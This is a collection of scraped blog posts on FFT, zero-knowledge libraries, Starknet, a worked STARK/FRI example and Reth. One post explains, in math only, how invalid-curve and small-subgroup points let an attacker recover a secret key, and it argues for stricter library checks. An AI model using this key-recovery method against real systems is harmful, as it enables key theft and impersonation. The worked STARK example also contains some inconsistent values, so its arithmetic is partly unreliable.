Our polynomials are typically represented using their coefficients, which we call a coefficient representation. However, we can also represent a polynomial with a series of points - precisely $n + 1$ points. It turns out that the product of two polynomials in the coefficient representation is equal to the pointwise multiplication of their point value representation, followed by a transformation of that result back to coefficients. Therefore, all we need is a way to transform the polynomial coefficient representation to a point value representation and then back to the coefficient representation, and that’s exactly what DFT and its inverse (IDFT) do.</p>
The transformation from coefficient form to point value form is known as the evaluation process of the polynomial, while the other way around is known as the interpolation process. However, the problem with DFT is that it does not improve the complexity of the overall computation because it performs all this magic in $O(N^2)$ operations too. This is where FFT comes in handy.</p>
The Fast Fourier Transform (FFT) algorithm is a computational technique used to efficiently compute the DFT by exploiting its symmetry and periodicity properties. The FFT algorithm uses a divide-and-conquer approach, where the coefficients are recursively divided into smaller sub-polynomials, and the DFT of each sub-polynomial is computed separately.</p>
The key idea behind the FFT algorithm is to decompose the DFT computation into a series of smaller, atomic DFTs, called butterflies</em> , that can be computed efficiently using multiplication and addition operations. The FFT algorithm significantly reduces the number of operations required to compute the DFT from $O(N^2)$ to $O(N*log(N))$, making it a practical solution for large polynomials.</p>
A FFT algorithm can have different characteristics, such as if it uses a Decimation in Time</em> or Decimation in Frequency</em> approach (changes the butterfly</em> operation), if it’s n-radix</em> (meaning that it divides the problem in n</em> every time) or mixed-radix</em> (divides the problem in multiple sizes), if its ordered</em> or not and which order does it handles, and a big etcetera.</p>
Since the entire algorithm is based on dividing the problem into two, it’s essential to ensure that the polynomials have an order that is a power of 2.</p>
That is a lot of information so let’s see a basic overview of these ideas:</p>
</p>
Working with finite fields</h3>
As mentioned earlier, we explained that the DFT works with complex numbers, but in our case, that won’t be necessary because all of the polynomials and calculations are done in finite fields. A finite field is a mathematical set with a finite number of elements satisfying certain algebraic properties, namely that you can sum, multiply and divide just like you can with regular numbers.</p>
The most common finite fields have a prime number of elements (called the order</em> of the field), so they are also called prime fields</strong>. Essentially, these are just the integers with the sum and multiplication done modulo the prime order, that is, operations “wrap around” when they go over it. If you’re interested in learning more about modular arithmetic and how it works, you can check out this resource</a>.</p>
Twiddle factors</h3>
One key aspect to understanding how the FFT algorithm works is the concept of twiddle factors</strong>. These factors are essential to exploiting the symmetry and periodicity properties of polynomials and enable the evaluation process to be completed with fewer operations. Typically, these factors are referred to as roots of unity - complex numbers that equal 1 when raised to some integer power $n$. As we previously mentioned, since we are working with finite fields, the twiddle factors used in our calculations are not complex numbers, but rather elements within the field.</p>
For example, in the field with elements ${0,1,2,3,4,5,6}$ with order $p = 7$, the number $6$ will be a $2nd$ root of unity since $6^2 mod 7 = 1$</p>
During the process of implementing FFT, it is crucial to calculate a specific number of roots of unity. However, in order to ensure that these calculations are both accurate and feasible, we require a specific characteristic for the prime fields we use. Specifically, the prime order of the fields must follow the form of $2^n k + 1$, where the $n$ is referred to as the “two-adicity” of the field. This condition guarantees that we can compute all necessary roots of unity to successfully carry out the FFT algorithm.</p>
Furthermore, when calculating the twiddle factors, we will determine a “primitive root of unity”, which enables us to easily obtain other primitive roots by raising it to the required $n_{th}$ power.</p>
This is just an introduction to the FFT algorithm, so don’t worry if everything isn’t clear yet. There are many intricacies involved in making this algorithm work, and additional calculations are required. To learn more about the FFT algorithm and how it operates, we highly recommend watching this excellent video</a>.</p>
Summary</h2>
Metal serves as a great alternative to CUDA on Mac systems, allowing us to perform expensive computations much faster. However, using Metal requires an understanding of its structures and new concepts in addition to the algorithm and code we want to run. We hope this post helped provide some clarity on those concepts.</p>
On another note, we’ve been exploring FFT, one of the greatest and most commonly used algorithms in the ZK world. Some of the mathematical concepts behind FFT are more complex and we want to explain those topics more in depth with more examples. Stay tuned for future posts on this exciting topic to learn how to bring it to code.</p>


Better sane defaults in Zero Knowledge Proofs libraries or how to get the prover's private key
Unknown — Thu, 09 Mar 2023 00:00:00 +0000
Introduction</h2>
Many ZK libraries allow the creation of pair of points $(x,y)$ which do not belong to the elliptic curve they are working with when building circuits. Some also do not check that the points belong to the appropriate subgroup, which can lead to vulnerabilities.</p>
The argument being made is that invalid points should not reach a prover. What is more surprising is that we would expect the example code or applications to tackle this issue, but they do not. They are not even giving thought to whether these additional checks are needed or not. Of course, many are worried about benchmarks since adding the constraints would make things slower, but removing the safety net and ignoring some attacks published many years ago is not a good long-term strategy. Even if these checks aren’t part of the prover, they must be somewhere and in many cases they aren’t! If builders take points, like Public Keys, from untrusted users, their system may be compromised, and secret keys may get stolen.</p>
Secret keys may reveal encrypted data or hold access to funds the server may need to operate.</p>
Going back to the checks, as we said before, they may not be needed if the application validates inputs before they reach the prover or if there is a thoughtful analysis of the protocol.</p>
But the first solution, while easy, may lead to censorship. Why should a prover reject a proof generation, saying the input is invalid, without proof that it is invalid?</p>
If there’s another bug in the code, there may be even more issues since a malicious user may have even more ways to scramble the program.</p>
In a practical example, some weeks ago, we found a bug that allows us to make the prover believe two points are equal when they are not</a>. Basically, they did not check that, given $A=(x_A,y_A)$ and $B=(x_B,y_B)$, $y_A=y_B$. If they check the points are in the elliptic curve, then necessarily, for the same $x=x_A=x_B$, there are only two possibilities, either $y_A=y_B$ or $y_A=-y_B$, since they have to satisfy the curve’s equation. If there is no such check (because the developer did not deem it necessary), then there are as many values as the order of the prime field for the $y$ coordinate.</p>
So, even if the protocol is not vulnerable, it is a good idea and engineering practice to keep some extra checks as a “defense in depth”</em> , to make the program more robust in case there are any other bugs that may be used in tandem with the lack of verifications to create exploits.</p>
A history of attacks and vulnerabilities.</h2>
The issue of not checking that a point belongs to a subgroup was first reported in 1997 by Chae Hoon Lira and Pil Joong Lee in  “A Key Recovery Attack on Discrete Log-based Schemes Using a Prime Order Subgroup”</a>.</p>
Meanwhile, the issue with not checking bad curves was first reported in the year 2000 by Bhiel in  “Differential fault attacks on elliptic curve cryptosystems “</a>. This article</a> also shows some problems when the code does not verify belonging to the elliptic curve.</p>
Let’s see how this exploit works with an example. We can write elliptic curves in Weierstrass form,

$$ y^2 = x^3 +a x + b $$

One crucial fact is that addition and doubling formulas do not depend on the value $b$. This means that two curves $E$ and $E^\prime$ have the same operations if they only differ in $b$. The curve $E^\prime$ is called an invalid curve relative to $E$, and an attacker may choose an $E^\prime$ with much weaker security.</p>
Suppose an attacker sends some point $Q$ of low order $k$ (the simplest case is $k=2$, which means that $2Q=\mathcal{O}$). If the attacker performs a key exchange with the user $A$ to derive a shared key $K=KDF(sk_A Q)$ and $A$ sends some message $m$ to the attacker, then he can learn $sk \equiv sk_k \pmod{k}$</p>
If the attacker repeats this process several times (using points of different order, all coprime), possibly using different invalid curves, he gets a system of congruences.</p>
$sk\equiv sk_1 \pmod{k_1}$

$sk\equiv sk_2 \pmod{k_2}$

$sk\equiv sk_3 \pmod{k_3}$

$sk\equiv sk_4 \pmod{k_4}$</p>
Then, he can use the Chinese Remainder Theorem to reconstruct $sk$ or at least a list of candidates and solve the remaining problem with brute force search. This leads to the attacker learning the secret key and impersonating the server or user, and even signing transactions on behalf of the user (leading to fund stealing, for example)</p>
We can extend this attack for protocols with a key exchange that starts diverging from the straightforward original example. For another example, see Practical Invalid Curve Attacks on TLS-ECDH

</a></p>
Summary</h2>
Many cryptographic libraries for zero-knowledge-proof applications remove or ignore some basic checks on elliptic curves, which can lead to vulnerabilities. We’re talking with the contributors of the libraries to fix these issues and disclose them.</p>
Even if they have been known for over 20 years, eagerness for performance has led to ignoring these issues, creating potential problems for developers building on top of these libraries. The question remains then, how far are our applications from these kinds of exploits, and how careful will the programmers be when handling data that can be poisoned.</p>
Good defaults are important. From our point of view, all the checks should be done by default in libraries and if they aren’t this should be made mor explicit. Good examples with sane defaults should be part of the libraries. Leaving the optimizing of code by removing checks for highly audited code where skipping those checks gives a real improvement to real users.</p>
Thanks to Diego Kingston and Mauro Toscano from LambdaClass for helping write this.</p>


How we are shaping the future of modular blockchains with  Zero Knowledge Proof, Starknet and Ethereum
Unknown — Tue, 07 Mar 2023 00:00:00 +0000
We believe in a permissionless future where individuals can cooperate and coordinate in scalable blockchain environments. With ten years of experience in distributed systems and a new obsession with cryptography, we can help builders achieve their goals.</p>
To realize this future, we believe that developers don’t have all the tooling necessary to create products that compete with the UI/UX of Web2. For the past year, we have been collaborating with StarkWare because the technology they have brought to the world will allow us to fulfill this objective. Specifically, STARKs and Cairo have not only been a major breakthrough in Computer Science but have also been battle-tested in StarkEx and, more recently it’s starting to be tested in Starknet.</p>
Unlike most other solutions, StarkEx has been in production for years, already serving millions of users and facilitating over 850B USD in trades since its inception. It’s not a permisionless system. That what Starknet brings to the table. It’s ecosystem already has more than 900 experienced and talented developers bringing new products to the world. We are confident that while Starknet may encounter problems but we know that we will be able to overcome them. We trust that the quality of engineers at StarkWare, in our own team and the Starknet community is between the bests of the world.</p>
We do recognize that there is still much work to be done. Specifically, it’s really important to be able to launch sequencers and provers. We also want to have light clients and support interoperable protocols such as IBC. A great example of this is zkMint</a>. These are some examples of the things that are missing to build the future of modular blockchains:</p>
    * Sovereign rollups where the data availability is stored in another chain like Bitcoin, Celestia or other systems</span></span>
    * Hybrid rollups using both optimistic and zero-knowledge techniques to get the best of both worlds</span></span>
    * ZK Storage proofs to be able to move assets between chains in a safer manner</span></span>
    * Safer wrapped assets</span></span>
    * Multichain orderbooks that uses the liquidity of multiple chains</span></span></code></pre>
We’re working to create internally and with other companies to build these tools and products.</p>
Our work in the Starknet ecosystem:</h3>
We developed cairo-rs</a>, which is now 150 times faster than the initial implementation. Over the last three months we worked over in our implementation of starknet_in_rust</a>. With starknet in rust and the cairo-rs vm we can now receive and execute transactions.</p>
We have been also making great progress on a Cairo STARK prover in LambdaWorks</a>. LambdaWorks is a library designed for building provers and verifiers for SNARKs in general but the first thing we built is the Cairo STARK prover. We still have to implement the proving of builtins. Hopefully with the help of Starkware we will have this done in the upcoming weeks.</p>
We’re also working on a Proof of Concept for a Starknet sequencer built with Tendermint Core</a> that can be used as learning path to decentralize L2 such as Starknet. Yesterday we were happy to learn that the community took this effort and added support for Sovereign Rollups on Celestia</a> using Rollkit</a>. We’re also working in a Sovereign Rollup to Bitcoin with Cairo and Starknet.</p>

broke: starknet as rollup with enshrined settlement layer

woke: starknet as sovereign rollup on celestia</p>
starknet <> rollkit <> celestia pic.twitter.com/h77HajcL2j</a></p>
— kari (@ammarif_) March 6, 2023</a></p>
</blockquote>
The Starknet sequencer will be decentralized</a>. With multiple sequencers it would be unnecessary to generate a execution trace since the sequencers can compare their results and let the prover generate the trace and the proof that is then checked in Ethereum L1.

This allows us to compile Cairo 1.0 into MLIR</a> so that they can be executed in a much faster manner from the sequencer. Therefore we are currently working on a Cairo to MLIR compiler</a></p>
It’s very unlikely that Starknet will implement an hybrid approach with Optimistic and at the same time ZK rollup but it would be possible to do it. In addition to this as we have mentioned before data availabilty could be done in a different chain.</p>
We’re also working on other projects in Starknet that will be made public in the upcoming weeks.</p>
How we think that ZK can empower builders to create a future with modular blockchains and more powerful applications</h3>
We are also trying to help projects that will help create a modular ecosystem but that have Ethereum and ZK as the main building blocks.</p>
Some of these projects are:

Herodotus</a></strong>

The Herodotus team is trying to bring interoperability and synchronism back to the Ethereum ecosystem. To do so, they leverage a cryptographic protocol called Storage Proofs that allows developers to read, access, and process on-chain data. Developers will utilize Storage Proofs to process data from Chain A to execute certain logic on Chain B. This is incredibly useful for build multichain (L2 to L2 for now only) applications like secure bridges and multichain lending.</p>
Giza</a></strong>

On the other hand, Giza is utilizing Cairo to make on-chain Machine Learning a reality. This will be incredibly useful for on-chain gaming, advanced DeFi protocols, and zkML. That said we think that once the proving part is done in a faster way it will be possible to prove the training and inference of ML models. This will be crucial to run complex ML models off chain and verify them on chain.</p>
We understand that this will not be a simple road, but we are excited to embark on this journey with our partners and test our abilities. In the last few years, here at LambdaClass, we have become a software powerhouse that specializes in developing critical infrastructure and our own products. We have had incredible growth, but we also believe we must empower other developer teams and communities, so stay tuned for further updates on our progress.</p>
If you want to hack with us, send us an email at federico@lambdaclass.com</a></p>


Diving DEEP FRI in the STARK world: learning your daily moon math with a concrete example
Unknown — Mon, 06 Mar 2023 00:00:00 +0000
Introduction</h2>
At LambdaClass, we are building Lambdaworks</a>, a library for developing zero-knowledge stuff. One important proof system is STARKs</a> (Scalable, transparent arguments of knowledge). STARKs are a powerful tool that allows us to prove the integrity of a given computation. For an overview of STARKs, you can look at our previous post</a> or the excellent tutorials by Starkware, such as STARK-101</a> (for the rust version, you can follow this link</a>) and the posts on arithmetization I</a> and II</a>, and Anatomy of a STARK</a>.</p>
In this post, we will do a pen-and-paper example of STARKs, so we can follow all the steps needed to generate and validate a proof (we will skip the hashing part, though). One important aspect to point out is that, in this case, we are not interested in the security properties of what we do (but it should really matter in real life). Let’s jump into the problem…</p>
Problem statement</h2>
Suppose we want to compute a sequence given by the following relations:

$a_0=3$

$a_{n+1}={a_n}^2$

The sequence gives the square of the previous number, starting with the value 3. We will use as modulus the prime 17 (a Fermat prime, $2^4+1$), and we will understand all operations done modulo 17. The advantage of 17 is that it contains a multiplicative group of 16 elements, which is helpful for STARKs (in general, we want $p-1$ to be $2^m\times q$, where $m$ should be sufficiently large and $q$ is an odd prime). The first four elements of the sequence are:

$a_0 = 3$

$a_1 = {a_0}^2 = 9$

$a_2 = {a_1}^2 = 9^2 = 81 \equiv 13 \pmod{17}$

$a_3 = {a_2}^2 = 13^2 = 169 \equiv 16 \pmod{17}$

The first step is to interpret these values as evaluations of a polynomial over a suitable domain. We are working with $p=17$, whose multiplicative group has 16 elements: $\{ 1 , 2 , 3 , 4 , \dots , 15 , 16 \}$. We will choose the following subgroup $D_t = {1 , 13 , 16, 4 }$, which is none other than the group formed by all powers of $13$ modulo $17$:

$13^0 = 1$

$13^1 = 13$

$13^2 = 169 \equiv 16 \pmod{17}$

$13^3 \equiv 4 \pmod{17}$

$13^4 \equiv 1 \pmod{17}$

From now on, we will drop the $\pmod{17}$ as understood from the context. We see that the powers of $13$ repeat every 4, which is the order of the element in the multiplicative group. Using this and calling the polynomial interpolating the trace as $t(x)$, we have:

$t(1) = 3$

$t(13) = 9$

$t(16) = 13$

$t(4) = 16$</p>
Interpolation</h2>
We can use Lagrange interpolation to find the polynomial (for larger problems, it is best to use the Fast-Fourier Transform):

$t(x) = L_1(x)t(1) + L_2(x)t(13) + L_3(x)t(16) + L_4(x)t(4)$

The Lagrange polynomial $L_1(x)$ is given by

$$L_1(x) = \frac{(x-13)(x-16)(x-4)}{(1-13)(1-16)(1-4)}$$

Doing the operations, we get

$L_1 (x)t(1) = 5(x^3 + x^2 + x + 1)$

Th other polynomials are

$L_2 (x)t(13) = 8x^3 + 2x^2 + 9x + 15$

$L_3 (x)t(16) = x^3 + 16x^2 + x + 16$

$L_4 (x)t(4) = 16x^3 + 13x^2 + x + 4$

The trace interpolating polynomial is thus

$t(x) = 13x^3 + 2x^2 + 16x + 6$

If we evaluate the polynomial at $D_t$, you can check that we get the same values as in the trace execution table.</p>
Committing to the trace polynomial</h2>
We have to commit to the trace interpolating polynomial. To do so, we perform a low-degree extension by choosing a larger domain, different from the original domain. If we choose $h = 9$ and its powers, we get a cyclic subgroup with $8$ elements, $\{ h^0 , h^1 , h^2 , \dots , h^7 \}$. This group contains elements from $D_t$, so we shift it to another domain by introducing an element from the coset, $w$, and forming the following domain,

$$ D_0 = \{ wh^0 , wh^1 , wh^2, \dots , wh^7 \}$$

We can choose $w = 3$, and so the domain becomes

$$ D_0 = \{ 3, 10, 5, 11, 14 , 7 , 12 , 6 \}$$

To commit, we evaluate $t(x)$ over all values in $D_0$ and form a Merkle tree whose leaves are those values.</p>
$x$</th> $t(x)$</th></tr></thead>

3</td> 15</td></tr>
10</td> 4</td></tr>
5</td> 10</td></tr>
11</td> 13</td></tr>
14</td> 16</td></tr>
7</td> 0</td></tr>
12</td> 0</td></tr>
6</td> 7</td></tr>
</tbody></table>
Enter the constraints</h2>
We now need to focus on the constraints over the trace elements the calculation gives. In this problem, we have two constraints:</p>
    1. Boundary condition. This applies to the first row, where $t(1)=3$.</span></span>
    2. Transition constraint. These are given by the multivariate polynomial $P(x,y) = y - x^2$, where if $x = a_n$, then $y = a_{n+1}$.  </span></span></code></pre>
What we need to do at this point is compose the trace polynomial with these constraints to enforce them over the whole trace.</p>
Boundary constraint</h3>
The first constraint is

$p_1 (x) = t(x)-3$

To ensure that it is enforced on the first step, the polynomial $p_1 (x)$ must be divisible by $x-1$ (a property of polynomials says that $p(a)=b$ if and only if $r(x) = p(x)-b$ is divisible by $x-a$).

We have

$p_1 (x) = 13x^3 + 2x^2 + 16x + 3$

If we factorize this polynomial, we get

$p_1 (x) = 13(x-1)(x^2 + 9x + 5)$

which has the factor $(x-1)$. If we divide, we get

$C_1 (x) = 13 (x^2 + 9x + 5)$

You can check that if we want $t (x) - a$ to be divisible by $x-1$, the necessarily $a=3$.</p>
Transition verification constraint</h3>
To evaluate the second constraint, we need to be able to choose an element of the trace and the next. We can do it by noting that the elements of $D_t$ are generated by $g = 13$, so if we select $x=x_0$, then $y=g x_0$ is the next. So, $y=t(gx)=t(13x)$ and

$t(gx) = x^3 + 15x^2 + 4x + 6$

We now replace these polynomials into the transition verification polynomial, $P(x,y)$, to get $p_2(x)$

$p_2 (x) = P(t(x) , t(gx)) = x^6 + 16 x^5 + 5x^4 + 2x^3 + 7x^2 + 16x + 4$

You can check that if we choose $x \in {1, 13, 16 }$ the polynomial evaluates to $0$. This is expected, since the elements $a_n$ and $a_{n+1}$ are linked by the formula $a_{n+1}= {a_n}^2$. This is no longer the case for $4$ since there is no next element. As before, if the constraints are valid, then $p_2 (x)$ should be divisible by $Z_2 (x)$, which is the vanishing polynomial over the domain where the constraints are enforced. In our case,

$Z_2 (x) = (x-1)(x-13)(x-16)$

We can also write it as

$$Z_2 = \frac{x^4 - 1}{x-4}$$

where we just remove the elements in which the constraints are not enforced. We verified that $p_2 (x)=0$ for $x \in {1, 13, 16 }$, so $p_2 (x)$ has factors $(x-1)(x-13)(x-16)$. Its complete factorization is

$p_2 (x) = (x-1)(x-13)(x-16)(x^3 + 12 x^2 + 9x + 16)$

Thus,

$$C_2 (x) = \frac{p_2 (x)}{Z_2 (x)} = x^3 + 12 x^2 + 9x + 16$$</p>
The (constraint) composition polynomial</h2>
We are now in a condition to build the composition polynomial

$$H(x) = C_1 (x) (\alpha_1 x^{ D - D_1 } + \beta_1 ) + C_2 (x) (\alpha_2 x^{ D - D_2 } + \beta_2 )$$

where the $\alpha_k$ and $\beta_k$ are values provided by the verifier. The terms $D - D_k$ are added so that all the polynomials in the linear combination have the same degree. We want the total degree to be a power of $2$, so $D=4$.</p>
Suppose the verifier samples as random coefficients the following: $\alpha_1 = 1$, $\beta_1 = 3$, $\alpha_2 = 2$, $\beta_2 = 4$. Then,

$C_1 (x) (1 x^{ 4 - 2 } + 3 ) = 13x^4 + 15 x^3 + 2 x^2 + 11x + 8$

$C_2 (x) (2 x^{ 4 - 3 } + 4 ) = 2x^4 + 11 x^3 + 15 x^2 + 13$

Then,

$H (x) = 15 x^4 + 9 x^3 + 11 x + 4$

Splitting the polynomial into odd and even terms,

$H_1 (x^2) = 15 x^4 + 4$

$H_2 (x^2) = 9x^2 + 11$

so that

$H(x) = H_1 ( x^2 ) + x H_2 (x^2)$

We can commit to the polynomial $H(x)$ or its parts, $H_1(x)$ and $H_2(x)$ by evaluating over $D_0$ and forming a Merkle tree.</p>
$x$</th> $H_1(x)$</th> $H_2(x)$</th></tr></thead>

3</td> 12</td> 7</td></tr>
10</td> 13</td> 10</td></tr>
5</td> 12</td> 15</td></tr>
11</td> 13</td> 12</td></tr>
</tbody></table>
Sampling outside the original domain</h2>
The verifier now chooses a random point, $z$, outside the trace interpolation and evaluation domains. In our example, the points outside those are $\{ 2, 8, 9 , 15 \}$. Suppose the verifier selected $z = 8$. Then,

$H ( 8 ) = 10$

with each part being

$H_1 (8^2) = 6$

$H_2 (8^2) = 9$

We need to check that the composition polynomial and trace elements are related. To be able to evaluate the constraints numerically, we need both $t(z)$ and $t(gz)$ (remember, $g$ is the generator of the trace interpolating domain) since we have to calculate $P(x,y)$. The necessary values are:

$t(8) = 16$

$t(13 \times 8) = t(2) = 14$</p>
Why does the verifier need this?</h2>
The verifier can now check that the trace and composition polynomial are related:</p>
    1. $p_1 (8) = t(8) - 3 = 13$</span></span>
    2. $Z_1 (8) = 8 - 1 = 7$</span></span>
    3. $C_1 (8) = p_1 (8) / Z_1 (8) = 13 \times 7^{-1} = 14$</span></span>
    4. $C_1 (8) (1\times 8^2 +3) = 3$</span></span>
    5. $p_2 (8) = t(2) - t(8)^2 = 13$</span></span>
    6. $Z_2 (8) = 8$</span></span>
    7. $C_2 (8) = p_2 (8)/ Z_2 (8) = 13 \times 8^{-1} = 8$</span></span>
    8. $C_2 (8) (2\times 8 +4) = 7$</span></span>
    9. $H (8) = C_1 (8) + C_2 (8) = 3 + 7 = 10$</span></span></code></pre>
We see that the evaluation of $H_1 (z^2)$ and $H_2 (z^2)$ matches the calculation of $H(z)$ from the trace elements.</p>
Ensuring the prover does not cheat</h2>
How does the verifier check that the values we passed are indeed the trace and composition polynomial evaluations at $z$ and $gz$? We can use the same trick: if the polynomial $y(x)$ evaluates to $b$ in $x=a$, then $y(x) - b$ is divisible by $x - a$. We form the DEEP composition polynomial,

$$ P_0 (x) = \gamma_1\frac{t(x)-t(z)}{x-z} + \gamma_2 \frac{t(x)- t(gz)}{x-gz}+\gamma_3 \frac{H_1 (x^2) - H_1 (z^2) }{x-z^2 } + \gamma_4 \frac{H_2 (x^2) - H_2 (z^2) }{x - z^2}$$

Let’s calculate each term

$$\frac{t(x)-t(8)}{x-8} = 13(x+13)(x+3) = 13 (x^2 + 16 x + 5)$$

$$\frac{t(x)-t(2)}{x-2} = 13(x+8)(x+2) = 13 (x^2 + 10 x + 16)$$

$$\frac{H_1 (x^2) - H_1 (8^2) }{x-8^2 } = 15(x+15)(x+8)(x+2) $$

$$\frac{H_2 (x^2) - H_1 (8^2) }{x-8^2 } = 9(x+8) $$</p>
Each term is a polynomial, so the linear combination is also a polynomial. By applying the FRI protocol, we must prove to the verifier that this is close to a low-degree polynomial. The polynomial is (using $\gamma_i = 1$),

$P_0 ( x ) = 15 x^3 + 15 x + 1$

We can commit to this polynomial using $D_0$ and forming a Merkle tree,</p>
$x$</th> $P_0(x)$</th></tr></thead>

3</td> 9</td></tr>
10</td> 4</td></tr>
5</td> 13</td></tr>
11</td> 3</td></tr>
14</td> 10</td></tr>
7</td> 15</td></tr>
12</td> 6</td></tr>
6</td> 16</td></tr>
</tbody></table>
Splitting into odd and even terms,

$xP_{0,odd} (x) = 15 x^3 + 15 x$

$P_{0,even} (x) = 1$

The verifier samples $\beta_0 = 4$. Then,

$P_1 (y=x^2) = 9y +10$

The domain is given by points of the form $y=x^2$, so $D_1 = \{ 9, 15, 8, 2\}$. The leaves of the Merkle tree are</p>
$y$</th> $P_1(y)$</th></tr></thead>

9</td> 6</td></tr>
15</td> 9</td></tr>
8</td> 11</td></tr>
2</td> 14</td></tr>
</tbody></table>
We repeat the process,

$yP_{0,odd} (y) = 9y$

$P_{0,even} (y) = 10$

The verifier samples $\beta_1 = 3$

$P_2 (z=y^2) = 3$.

And we ended with a constant polynomial. This second domain is $D_2 = \{13, 4\}$</p>
Checking FRI layers</h2>
To generate the proof, the verifier chooses an element from $D_0$. We have to send him all the elements needed to reconstruct the evaluations of the composition polynomial and the FRI steps. Say he chooses $x=10$, which corresponds to the index equal to $1$. To evaluate everything, we must pass the evaluation at $x$ and $-x$ for each layer and the trace polynomial evaluated at $x$ and $gx$.</p>
From $P_0(x)$ we pass the values $P_0(x=10)=4$ and $P_0(x=7)=15$, together with their authentication paths.

From $P_1(x)$ we pass the values $P_1(x=15)=9$ and $P_1(x=2)=11$ and their authentication paths.

From $P_2(x)$, we only need the constant value of $3$.</p>
Checking the correctness of FRI requires verifying that each value corresponds to its Merkle tree and the colinearity test,

$$P_{i+1}(x^2)=\frac{P_i(x) + P_i(-x)}{2}+\beta_i \frac{P_i (x) - P_i (-x)}{2x}$$

Let’s check the jump from each layer:

$$P_1(15) = 16 = \frac{P_0(10) + P_0(7)}{2} + 4 \frac{P_0 (10) - P_0 (7)}{2\times 10}$$

We can see that

$$\frac{P_0(10) + P_0(7)}{2} = 1$$

and

$$ 4 \frac{P_0 (10) - P_0 (7)}{2\times 10} = 8$$</p>
Let’s jump onto the next layer,

$$P_{2}(y^2)=\frac{P_1(y) + P_1(-y)}{2}+\beta_1 \frac{P_1 (y) - P_1 (-y)}{2y}$$

Replacing the values,

$$P_{2}(y^2) = 3$$

and

$$ \frac{P_1(15) + P_1(2)}{2} = 10$$

$$ 3\frac{P_1 (15) - P_1 (2)}{2\times 15} = 10$$

But

$$ 10 + 10 = 3 = P_2(4)$$

which completes the check. You can try selecting other indices and verifying the proof.</p>
The only remaining check shows that the trace and composition polynomial are related. We leave it as a challenge (the answer will appear shortly)</p>
Summary</h2>
This post covered a pen-and-paper example of computational integrity using STARKs. We chose a sequence where each element is the square of the previous one, starting from 3. We stated the problem, interpreted the computation as evaluating a polynomial over a suitable domain, and performed Lagrange interpolation. After that, we enforced the constraints over the execution trace and obtained the composition polynomial. To improve soundness, we forced the prover to evaluate at a point $z$ outside the domain and showed that the trace and composition polynomial are related. Then, we created a rational function that ensured the prover did not cheat and sent the correct values. If the prover is honest, then the resulting function is a polynomial, and we proved by showing that it is close to a low-degree polynomial using FRI. If you want to try more complicated examples, follow the updates at Lambdaworks.</p>


Our small contribution to Paradigm’s Reth to diversify Ethereum clients
Unknown — Mon, 06 Mar 2023 00:00:00 +0000
In December, last year, we heard about Reth</a>, and it immediately piqued our interest. A greenfield new implementation of an Ethereum full node? Where do we sign up!?</p>
The project, started and driven by @gakonst</a> from Paradigm (if you haven’t heard about it yet, we encourage you to read gakonst’s introductory post</a> ), aims to not just experiment improvements to performance, safety, software reuse through modularity, and node architecture, but also to contribute to Ethereum’s stability by improving implementation diversity.</p>
These goals strongly resonated with our values and interests, the intersection of deep technical problems, good engineering, and building in the open and jointly. “Diversity” is not just a buzzword: time and time again we’ve seen how monocultures stagnate, how team composition and output benefits from integrating differing viewpoints and experiences, how the state of the art advances by integrating engineering and research, and how software projects grow stronger, instead of weaker, by having several implementations of the same thing. It’s not just</em> “more eyeballs”, or “competition breeds excellence”. It’s an emergent property.</p>
All this made us commit to contributing, but when we started we had to first go out on a learning path: the evolution and design tradeoffs of blockchain node architectures and protocols, the nitty gritty of implementing data structures and patterns used in crypto projects, and so on. For ourselves, we expected to just learn and hone our skills in this process of giving back, but were very satisfied to see other benefits: other projects we were working on required something we learned working on reth, or viceversa. Our seniors had interesting problems to work on, and our juniors had excellent guidance in their maturation process.</p>
Among the many fascinating things one learns when working on cryptocurrency infrastructure project internals is just how to structure such a beast. Blockchain nodes are a kind of distributed database, so they need to handle incoming requests, both to read from the node storage and to write to the transaction mempool, handle connections to peers and the protocol used to communicate with them, and manage the actual storage of the data and cryptographic data structures used to provide the features and guarantees blockchains are known for.</p>
As mentioned elsewhere, Reth takes some cues from Akula and Erigon, which propose a different architecture</a> than Geth, again, more modular and built up out of commmunicating components which can be separated out into other processes or projects as needed. A key component is the staged</a> sync</a>, a version of Go-Ethereum’s Full Sync designed with performance in mind.</p>
This staged sync is in essence a state machine consisting of series of stages, each one of which is a segmented part of the syncing process of the node. Each stage takes care of one well-defined task, such as downloading headers or executing transactions, persist their results to a database, and roll forwards and backwards according to required changes. Each stage is thus executed once, unless an interruption or a network reorg/unwind requires restarting or rolling back.</p>
In Reth, the staged sync pipeline executes queued stages serially. An external component determines the tip of the chain and the pipeline then executes each stage in order from the current local chain tip and the external chain tip. When a stage is executed, it will run until it reaches the chain tip.</p>
The reth docs</a> for the pipeline have an excellent diagram detailing how the stages work.</p>
</p>
Of course, nothing is written in stone, and may change as possible improvements are detected and implemented, and as the project takes on it’s own direction.</p>
What is relevant here is how things one takes for granted need in other contexts to be re-thought and implemented, such as maintaining data consistency, being able to provide efficient rollbacks and cryptographic hash state computations, etc.</p>
But at the end of the day, code rules. Here are some of the more interesting PRs we were able to contribute:</p>
    * [Adding a stage to the sync pipeline for calculating the chain’s state root in an incremental fashion](https://github.com/paradigmxyz/reth/pull/994)</span></span>
    * [Adaptable request timeouts](https://github.com/paradigmxyz/reth/pull/789)</span></span>
    * [Prioritizing requesting peers with low latency](https://github.com/paradigmxyz/reth/pull/835)</span></span>
    * [Adding support for prometheus metrics](https://github.com/paradigmxyz/reth/pull/474) to the [headers sync stage](https://github.com/paradigmxyz/reth/pull/498) and [txpool](https://github.com/paradigmxyz/reth/pull/584).</span></span></code></pre>
As well as general tests and documentation.</p>
We are thankful to Paradigm for spearheading and allowing us to collaborate with them and the community. Managing a project takes time and effort.</p>
EOF.</p>


LambdaWorks or how we decided to create our zkSNARKs library and a STARK prover
Unknown — Wed, 01 Mar 2023 00:00:00 +0000
Introduction</h2>
We think that most ZK libraries are not yet easy-to-use. Most of them assume that the user had a significant cryptography background, making it hard for a newcomer to learn from them, even if he had all the code in front of him. We also found that some commonly used libraries had poor documentation or hard-to-follow examples for beginners. In addition to this some libraries don’t follow state of the art engineering practices that are crucial to build reliable systems that go to production. There are many efforts like Cairo, Noir that don’t have these issues but they are full blown programming languages. We wanted a tool to build languages like those, new proving systems or anything that we need.</p>
So, we decided to start building our LambdaWorks</a> library with the following goals in mind:</p>
    1. Implemented in Rust with WASM support and an FFI API in other mainstream languages</span></span>
    2. Easy to use API</span></span>
    3. Contains most famous proving systems (Groth16, Plonk, STARKs, Plonky2 and maybe Halo2) and recursion/IVC (Nova, Supernova)</span></span>
    4. Allow for hardware acceleration, such as GPU and FPGA integration</span></span>
    5. Clear documentation with different kinds of tutorials, from starters to advanced users</span></span></code></pre>
